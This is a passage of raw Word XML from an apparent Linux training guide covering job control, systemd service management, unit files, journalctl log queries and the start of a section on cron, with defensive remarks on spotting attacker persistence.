          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Job Control: Foreground &amp; Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Job control lets you manage multiple processes within a terminal session — running long tasks in the background while continuing to work in the foreground. Understanding this is important for both productivity and recognizing how attackers maintain persistent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Command / Key</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Description &amp;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Ctrl +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Send SIGINT to the foreground process — terminates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Ctrl + Z</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Send SIGSTOP to the foreground process — suspends (pauses) it and returns control to the shell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command &amp;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Start a command directly in the background. Example: ping -c 1000 8.8.8.8 &amp;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jobs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List all background and suspended jobs in the current shell session with their job numbers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bg %n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Resume a suspended job in the background. Example: bg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fg %n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Bring a background or suspended job to the foreground. Example: fg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nohup command &amp;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Run a command immune to SIGHUP — continues running even if the terminal closes. Output goes to nohup.out.
Example: nohup ./long_scan.sh &amp;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disown %n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Remove a job from the shell's job table so it survives terminal closure even without nohup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Example job control workflow</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Start a long-running task</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ sleep 300</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">^Z                   # Press Ctrl+Z to suspend it</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[1]+  Stopped    sleep 300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See the suspended job</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ jobs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[1]+  Stopped    sleep 300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Send it to the background</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ bg %1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[1]+ sleep 300 &amp;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Start another task in the background directly</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ ping -c 100 8.8.8.8 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] 4521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List both jobs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ jobs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[1]-  Running    sleep 300 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[2]+  Running    ping -c 100 8.8.8.8 &amp;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Bring job 2 to the foreground</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ fg %2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Management with systemd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd is the init system and service manager used by most modern Linux distributions (Ubuntu, Debian, CentOS, Fedora, Kali, etc.). It is responsible for starting, stopping, and managing all system services (daemons) and is the first process started by the kernel (PID 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd Units</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In systemd, everything is managed as a 'unit'. The most common unit type is a service unit (.service), which represents a background daemon. Other unit types include .socket, .timer, .mount, and .target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl — The Primary systemd Tool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systemctl Command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Description &amp;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systemctl start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Start a service immediately (does not persist across reboots)
Example: sudo systemctl start apache2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systemctl stop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Stop a running service
Example: sudo systemctl stop apache2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systemctl restart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Stop then start a service (applies config changes)
Example: sudo systemctl restart ssh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systemctl reload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Reload service configuration without full restart (sends SIGHUP)
Example: sudo systemctl reload nginx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systemctl enable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Enable service to start automatically at boot
Example: sudo systemctl enable ssh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systemctl disable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Prevent service from starting at boot
Example: sudo systemctl disable bluetooth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systemctl status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Show current status, last log lines, and PID of a service — most useful command for investigation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systemctl is-active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Returns 'active' or 'inactive' — useful in scripts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systemctl is-enabled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Returns 'enabled' or 'disabled' — check if starts at boot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systemctl list-units --type=service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List all loaded service units and their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systemctl list-unit-files --type=service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List all installed service unit files with enabled/disabled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systemctl daemon-reload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Reload systemd's configuration after editing unit files — required after any unit file change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Check if SSH service is running and view recent logs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo systemctl status ssh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 output:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">● ssh.service - OpenBSD Secure Shell server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">     Active: active (running) since Mon 2025-04-07 09:12:44 UTC; 2h 15min ago</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Process: 892 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   Main PID: 901 (sshd)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List all currently running services</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl list-units --type=service --state=running</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List all services that start at boot</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl list-unit-files --type=service --state=enabled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Disable and stop a service in one step</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo systemctl disable --now bluetooth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Unit Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Service unit files define how a service is started, stopped, and managed. They live in /lib/systemd/system/ (system defaults) or /etc/systemd/system/ (admin overrides). Understanding them is critical for detecting persistence mechanisms planted by attackers.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View the unit file for SSH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /lib/systemd/system/ssh.service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 typical unit file structure:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[Unit]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Description=OpenBSD Secure Shell server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">After=network.target auditd.service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[Service]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Type=notify</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ExecStartPre=/usr/sbin/sshd -t</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ExecStart=/usr/sbin/sshd -D</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ExecReload=/bin/kill -HUP $MAINPID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Restart=on-failure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[Install]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WantedBy=multi-user.target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Look for suspicious unit files created recently</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">find /etc/systemd/system/ -name '*.service' -newer /etc/passwd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Check all unit files in /etc/systemd/system/ (admin-created = higher suspicion)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /etc/systemd/system/*.service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing Logs with journalctl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd includes a centralized logging daemon called journald. All service logs are collected in the systemd journal. journalctl is the tool used to query and view these logs.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View all journal logs (most recent last)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl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View logs for a specific service</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -u ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -u apache2 --since today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Follow logs in real time (like tail -f)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -f</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -fu ssh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logs since a specific time</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl --since '2025-04-10 08:00:00' --until '2025-04-10 10:00:00'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only error and critical messages</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -p err</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -p crit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kernel messages</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl -k</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logs for a specific PID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl _PID=1204</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled Tasks: cron &amp; at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled tasks allow commands to run automatically at specified times or intervals. From a security perspective, cron is one of the most common persistence mechanisms used by attackers — malware often installs a cron job to re-execute itself if removed, or to exfiltrate data on a regular schedule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
